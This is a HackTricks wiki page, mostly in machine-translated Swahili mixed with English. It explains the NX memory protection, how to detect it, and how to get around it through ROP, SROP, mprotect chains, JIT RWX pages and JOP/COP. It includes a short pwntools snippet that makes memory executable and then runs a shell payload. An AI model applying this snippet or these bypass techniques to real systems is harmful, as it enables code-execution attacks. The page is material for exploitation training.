No-exec / NX

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Taarifa za Msingi

The No-Execute (NX) bit, also known as Execute Disable (XD) in Intel terminology, ni kipengele cha usalama kinachotegemea vifaa kilichoundwa kupunguza athari za mashambulizi ya buffer overflow. Wakati kimewekwa na kuwezeshwa, hutofautisha maeneo ya kumbukumbu yaliyo kusudiwa kwa ajili ya executable code na yale yaliyokusudiwa kwa data, kama vile stack na heap. Wazo kuu ni kuzuia mshambuliaji kuendesha code hatarishi kupitia udhaifu wa buffer overflow kwa kuweka code hiyo hatarishi kwenye stack kwa mfano na kuelekeza mtiririko wa utekelezaji kuelekea hapo.

Mfumo wa sasa wa uendeshaji unatekeleza NX kupitia sifa za jedwali la ukurasa zinazounga mkono vichwa vya programu za ELF. Kwa mfano, kichwa cha PT_GNU_STACK pamoja na mali za GNU_PROPERTY_X86_FEATURE_1_SHSTK au GNU_PROPERTY_X86_FEATURE_1_IBT hufanya loader ijue kama stack inapaswa kuwa RW au RWX. Wakati NX imewezeshwa na binary ilihusishwa na stack isiyo-executable (-z noexecstack), jaribio lolote la kuzungusha utekelezaji kwenda kwenye kurasa za data zinazodhibitiwa na mshambuliaji (stack, heap, mmap’ed buffers, n.k.) litasababisha hitilafu isipokuwa kurasa hizo zilikuwa wazi wazi zimewekwa kama executable.

Kutambua NX kwa haraka

  • checksec --file ./vuln itaonyesha NX enabled au NX disabled kulingana na kichwa cha programu GNU_STACK.
  • readelf -W -l ./vuln | grep GNU_STACK inaonyesha stack permissions; kuwepo kwa flag E inaonyesha kuwa stack ni executable. Example:
$ readelf -W -l ./vuln | grep GNU_STACK
GNU_STACK      0x000000 0x000000 0x000000 0x000000 0x000000 RW  0x10
  • execstack -q ./vuln (from prelink) ni ya msaada wakati wa kufanya ukaguzi wa makusanyo makubwa ya binaries kwa sababu inachapisha X kwa binaries ambazo bado zina executable stack.
  • Wakati wa runtime, /proc/<pid>/maps itaonyesha kama allocation ni rwx, rw-, r-x, n.k., jambo linalofaa wakati wa kuthibitisha JIT engines au custom allocators.

Njia za kuipita

Code-reuse primitives

Inawezekana kutumia techniques kama ROP ili kuipita ulinzi huu kwa kuendesha vipande vya executable code vilivyopo tayari kwenye binary. Mnyororo wa kawaida unajumuisha:

  • Ret2libc
  • Ret2syscall
  • Ret2dlresolve when the binary does not import system/execve
  • Ret2csu or Ret2vdso to synthesize syscalls
  • Ret2… — any dispatcher that lets you stitch controlled register state with existing executable code to invoke syscalls or library gadgets.

Zoezi kawaida ni: (1) leak pointer ya code au libc kupitia info leak, (2) kutatua function bases, na (3) kutengeneza chain ambayo haitahitaji executable bytes zinazosimamiwa na mshambuliaji.

Sigreturn Oriented Programming (SROP)

SROP builds a fake sigframe on a writable page and pivots execution to sys_rt_sigreturn (or the relevant ABI equivalent). The kernel then “restores” the crafted context, instantly granting full control over all general-purpose registers, rip, and eflags. Changamoto za CTF za karibuni (mfano, task ya Hostel katika n00bzCTF 2023) zinaonyesha jinsi SROP chains zinavyoitisha kwanza mprotect kubadili stack kuwa RWX, kisha kutumia tena stack hiyo kwa shellcode, kwa ufanisi kuipita NX hata wakati gadget moja tu ya syscall; ret inapatikana. Check the dedicated SROP page for more architecture-specific tricks.

Ret2mprotect / ret2syscall to flip permissions

If you can call mprotect, pkey_mprotect, or even dlopen, you can legitimately request an executable mapping before running shellcode. Mfano mdogo wa pwntools unafanana na:

from pwn import *
elf = ELF("./vuln")
rop = ROP(elf)
rop.mprotect(elf.bss(), 0x1000, 7)
payload = flat({offset: rop.chain(), offset+len(rop.chain()): asm(shellcraft.sh())})

Wazo lile lile linaweza kutumika kwa minyororo ya ret2syscall ambayo huweka rax=__NR_mprotect, huonyesha rdi kwa ukurasa wa mmap/.bss, huhifadhi urefu unaotakiwa katika rsi, na huweka rdx=7 (PROT_RWX). Mara tu eneo la RWX linapokuwepo, utekelezaji unaweza kuruka kwa usalama ndani ya byte zinazodhibitiwa na mvaaji.

RWX primitives from JIT engines and kernels

JIT engines, interpreters, GPU drivers, na subsystems za kernel ambazo zinatengeneza code kwa wakati wa utekelezaji ni njia ya kawaida ya kupata tena memory inayotekelezwa hata chini ya sera kali za NX. Udhaifu wa kernel ya Linux wa 2024 CVE-2024-42067 ulionyesha kwamba kushindwa kwa set_memory_rox() kuliacha kurasa za eBPF JIT ziwe za kuandikwa na zitekelezwe, zikimruhusu mvaaji kusambaza gadgets au blob zote za shellcode ndani ya kernel licha ya matarajio ya NX/W^X. Exploits zinazopata udhibiti wa JIT compiler (BPF, JavaScript, Lua, n.k.) zinaweza kupanga payload yao ikaishi katika maeneo hayo ya RWX na zinahitaji tu single function pointer overwrite ili kuruka ndani yake.

Non-return code reuse (JOP/COP)

Ikiwa maelekezo ya ret yameteketishwa (kwa mfano, CET/IBT) au binary hauna ret gadgets zenye nguvu, badilisha mkondo kwa Jump-Oriented Programming (JOP) au Call-Oriented Programming (COP). Mbinu hizi hujenga dispatchers zinazotumia mfululizo wa jmp [reg] au call [reg] zinazopatikana katika binary au maktaba zilizopakiwa. Zinaheshimu NX kwani zinatumia tena code za utekelezaji zilizo tayari, lakini zinapita kando ya mitigations zinazolenga mnyororo mrefu wa maelekezo ya ret.

ROP & JOP

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks